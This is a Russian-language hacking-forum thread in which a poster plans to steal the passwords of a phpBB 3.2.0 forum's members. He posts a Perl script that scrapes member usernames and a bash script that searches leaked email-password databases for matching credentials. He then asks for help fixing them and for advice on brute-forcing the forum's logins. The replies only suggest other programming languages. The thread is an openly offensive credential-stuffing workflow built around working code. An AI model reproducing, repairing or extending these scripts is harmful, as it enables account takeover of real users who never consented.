Форумы Комплексный вопрос по PhpBB (граббер, брут).

Discussion in 'Уязвимости CMS/форумов' started by SladerNon, 7 Oct 2018.

  1. SladerNon

    SladerNon Илья Пророк

    Joined:
    6 Mar 2005
    Messages:
    1,637
    Likes Received:
    288
    Reputations:
    354
    Столкнулся со следующей задачей: Цель PhpBB 3.2.0 (Регистрация на форуме не работает, и основная задача у меня, "захватить" как можно больше паролей зарегистрированных участников)

    1). Вопрос №1. Необходимо спарсить логины всех участников форума. Найденное решение:
    PHP:
    #!/usr/bin/perl

    use LWP::UserAgent;
    print 
    qq(
    Enter adress:
    e.g. - http://forum.site.ru/
    > );
    $adr=<STDIN>;
    chomp($adr);
    print 
    qq(
    Enter numbers of page witch users:
    e.g. - 500
    > );
    $page=<STDIN>;
    chomp($page);
    open (A">>nicknames.txt");
    $count 0;
    while (
    $count <= $page) {
    $url=$adr."memberlist.php?start=".$count."0";
    $count ++,$count ++,$count ++,$count ++,$count ++;
    $client LWP::UserAgent->new( ) or die;
    $answer $client->get($url);
    @
    nicknames=$answer->content =~ /<a href=\".*?mode=viewprofile.*\" class=\"gen\">(.*)<\/a>/g;
    print A join "
    \n", @nicknames;}
    Только зараза не работает. Где тут ошибка-то?

    2). Вопрос №2. Выбрать из отпарсенных логинов те, которые имеют вид e-mail адреса. Такие на форуме есть. (Ну с этим проблем возникнуть не должно. Готового софта для этой цели предостаточно).

    3). Вопрос №3. Скачав различные базы вида e-mail-pass, сделать отбор известных паролей, для отпарсенных логинов. Решение вот такое:
    PHP:
    #!/bin/bash
    dir=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )

    if [ 
    "$1" != "" ]; then
        letter1
    =$(echo ${1,,}|cut -b1)
        if [[ 
    $letter1 == [a-zA-Z0-9] ]]; then
            
    if [ -"$dir/data/$letter1]; then
                grep 
    -ai "^$1" "$dir/data/$letter1"
            
    else
                
    letter2=$(echo ${1,,}|cut -b2)
                if [[ 
    $letter2 == [a-zA-Z0-9] ]]; then
                    
    if [ -"$dir/data/$letter1/$letter2]; then
                        grep 
    -ai "^$1" "$dir/data/$letter1/$letter2"
                    
    else
                        
    letter3=$(echo ${1,,}|cut -b3)
                        if [[ 
    $letter3 == [a-zA-Z0-9] ]]; then
                            
    if [ -"$dir/data/$letter1/$letter2/$letter3]; then
                                grep 
    -ai "^$1" "$dir/data/$letter1/$letter2/$letter3"
                            
    fi
                        
    else
                            if [ -
    "$dir/data/$letter1/$letter2/symbols" ]; then
                                grep 
    -ai "^$1" "$dir/data/$letter1/$letter2/symbols"
                            
    fi
                        fi
                    fi
                
    else
                    if [ -
    "$dir/data/$letter1/symbols" ]; then
                        grep 
    -ai "^$1" "$dir/data/$letter1/symbols"
                    
    fi
                fi
            fi
        
    else
            if [ -
    "$dir/data/symbols" ]; then
                grep 
    -ai "^$1" "$dir/data/symbols"
            
    fi
        fi
    else
        echo 
    "[*] Example: ./query name@domain.com"
    fi
    Скрипт хорошо работает. По запросу ./query name@domain.com - выводится нужная инфа по этому мылу, если она есть. Однако мне требуется: одной командой вывести в текстовый файл, всю инфу про всех нужных мне e-mail. Как подправить скрипт?

    4) Вопрос №4: По нужным логинам и выбранных для каждого логина пароля(лей), сделать брут форума. Что посоветуйте?


    :cool:
     
    #1 SladerNon, 7 Oct 2018
    Last edited: 7 Oct 2018
  2. FriLL

    FriLL Member

    Joined:
    14 Sep 2008
    Messages:
    89
    Likes Received:
    22
    Reputations:
    6
    для подобных задач обычно просто пишу скрипт на питоне, т.к. это возможно займёт времени меньше чем поиск готовых аналогов
     
  3. Gorbachev

    Gorbachev Member

    Joined:
    23 Mar 2017
    Messages:
    116
    Likes Received:
    21
    Reputations:
    0
    Бро, проснись. Сейчас 2018 год, ктож на перле то пишет? Используй язык GO, и будет свет.
     
Loading...